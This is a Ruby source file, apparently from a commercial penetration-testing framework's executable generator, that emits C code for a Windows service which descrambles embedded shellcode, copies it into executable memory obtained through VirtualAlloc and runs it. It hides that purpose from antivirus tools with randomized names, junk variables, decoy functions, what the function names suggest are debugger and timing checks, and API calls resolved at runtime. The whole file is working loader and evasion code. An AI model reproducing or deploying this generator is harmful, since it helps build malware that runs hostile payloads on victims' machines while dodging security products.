require 'pro/exegen/pseudofunction'
require 'pro/exegen/base_generator'

module Pro
module ExeGen
class ServiceGenerator < BaseGenerator

	VAR_NAME_LENGTH = 12

	UBOUND_FILLER_VARS = 50

	UBOUND_FIRST_FUNCTIONS        = 20
	UBOUND_SECOND_FUNCTIONS   = 10
	LBOUND_FUNCTIONS                    = 10

	def initialize(code)
		@code =  code
		@names = {
			:idx_code  => ::Rex::Text.rand_text_alpha(VAR_NAME_LENGTH) ,
			:code      => ::Rex::Text.rand_text_alpha(VAR_NAME_LENGTH) ,
			:svc       => ::Rex::Text.rand_text_alpha(VAR_NAME_LENGTH)
		}
		@ccode = generate_c
	end

	attr_reader :ccode
	attr_reader :code
	attr_reader :names



	def variable_defs
		vdefs = [] 
		vdefs << %Q|unsigned char #{@names[:code]}[#{@code.length}];|
		vdefs << %Q|int #{@names[:idx_code]}[#{@code.length}];|
		vdefs << %Q|SERVICE_STATUS ss;|
		vdefs << %Q|SERVICE_STATUS_HANDLE hStatus = NULL;|
		vdefs << %Q|char cServiceName[32] = "#{@names[:svc]}";|
		(rand(UBOUND_FILLER_VARS) +1).times do 
			type = [ "short", "unsigned short", "int", "unsigned int", "double", "float", "long"][rand(7)]
			name = ::Rex::Text.rand_text_alpha(VAR_NAME_LENGTH)
			vdefs << "#{type} #{name};" 
		end
		retdefs = Rex::Text.shuffle_a(vdefs).join("\n")
		return retdefs
	end

	def svc_handler_func
		svc_handler = <<EOS
BOOL ServiceHandler( DWORD dwControl )
{
	if( dwControl == SERVICE_CONTROL_STOP || dwControl == SERVICE_CONTROL_SHUTDOWN )
	{
		ss.dwWin32ExitCode = 0;
		ss.dwCurrentState  = SERVICE_STOPPED;
	}
	PSSS setsvcstat = (PSSS) GetProcAddress(LoadLibrary("Advapi32.dll"), "SetServiceStatus");
	return setsvcstat( hStatus, &ss );
}
EOS
	end


	def svc_main_func(unscramble_name,function_callers)
		svc_main = <<EOS
void ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
{
	for(int i=0;i<500;i++){
		for(int j=0;j<500;j++){
			#{function_caller_grab_bag(function_callers)}
		}
		for(int k=0;k<500;k++){
			#{function_caller_grab_bag(function_callers)}
		}
	} 

	#{payload_data}

	ss.dwServiceType = SERVICE_WIN32_SHARE_PROCESS;

	ss.dwCurrentState = SERVICE_START_PENDING;

	ss.dwControlsAccepted = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_SHUTDOWN;

	PRSCH regsvcctrlh = (PRSCH) GetProcAddress(LoadLibrary("Advapi32.dll"), "RegisterServiceCtrlHandlerA");

	hStatus = regsvcctrlh( (LPCSTR)&cServiceName, (LPHANDLER_FUNCTION)ServiceHandler );

  
	if ( hStatus )
	{
		ss.dwCurrentState = SERVICE_RUNNING;

		PSSS setsvcstat = (PSSS) GetProcAddress(LoadLibrary("Advapi32.dll"), "SetServiceStatus");

		setsvcstat( hStatus, &ss );


		#{function_caller_grab_bag(function_callers)}
		#{unscramble_name}(#{@names[:code]}, #{@names[:idx_code]});	
		#{function_caller_grab_bag(function_callers)}

		LPVOID ep;

		PVA valoc = (PVA) GetProcAddress(LoadLibrary("kernel32.dll"), "VirtualAlloc");
		ep = valoc(NULL, #{ (1024*1024) + rand(256) * 1024 }, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

		PMCPY mmcy = (PMCPY) GetProcAddress(LoadLibrary("ntdll.dll"), "memcpy");
		mmcy(ep, &#{@names[:code]}, sizeof(#{@names[:code]}));

		((void (*)())ep)();
		#{function_caller_grab_bag(function_callers)}
		
		ServiceHandler( SERVICE_CONTROL_STOP );

	}
}
EOS

	end


	def generate_c
		
		first_function_set = []
		(rand(UBOUND_FIRST_FUNCTIONS ) + LBOUND_FUNCTIONS).times{ first_function_set << ::Pro::ExeGen::Pseudofunction.new }
		first_function_set << idbp_func
		first_function_set << rdbp_func
		first_function_set << tickcount_func
		
		second_function_set = []
		(rand(UBOUND_SECOND_FUNCTIONS) + LBOUND_FUNCTIONS).times do 
			subs = []
			0.upto(rand(5)){|n| subs << first_function_set[rand(first_function_set.length)]}
			second_function_set << ::Pro::ExeGen::Pseudofunction.new(:subs => subs)
		end

		first_function_calls = []
		first_function_set.each{|function| first_function_calls << "#{function.fcaller}" }
		second_function_calls = []
		second_function_set.each{|function| second_function_calls << "#{function.fcaller}" }
		
		first_function_calls = Rex::Text.shuffle_a(first_function_calls)
		usf = unscramble_func
		

		
		second_function_calls = Rex::Text.shuffle_a(second_function_calls).join("\n")

		
		first_function_calls_str = first_function_calls.join("\n")


		first_function_set << usf


		first_function_set = Rex::Text.shuffle_a(first_function_set)
		second_function_set = Rex::Text.shuffle_a(second_function_set)

		function_definitions = ""
		first_function_set.each{|function| function_definitions << "#{function.definition}\n\n" }
		second_function_set.each{|function| function_definitions << "#{function.definition}\n\n" }


agent_wrapper = <<EOS
#{includy_stuff}
#{variable_defs}

#{function_definitions}
#{svc_handler_func}
#{svc_main_func(usf.name,first_function_calls)}


void main(void)
{
	#{first_function_calls_str}

	SERVICE_TABLE_ENTRYA st[] = 
    { 
        { (LPSTR)&cServiceName, (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain }, 
        { NULL, NULL } 
    };
	#{second_function_calls}

	

	PSSCD stsvcctrldis = (PSSCD) GetProcAddress(LoadLibrary("Advapi32.dll"), "StartServiceCtrlDispatcherA");
	#{function_caller_grab_bag(first_function_calls)}
	return stsvcctrldis( (SERVICE_TABLE_ENTRYA *)&st );
}
EOS
	return agent_wrapper
	end


end
end
end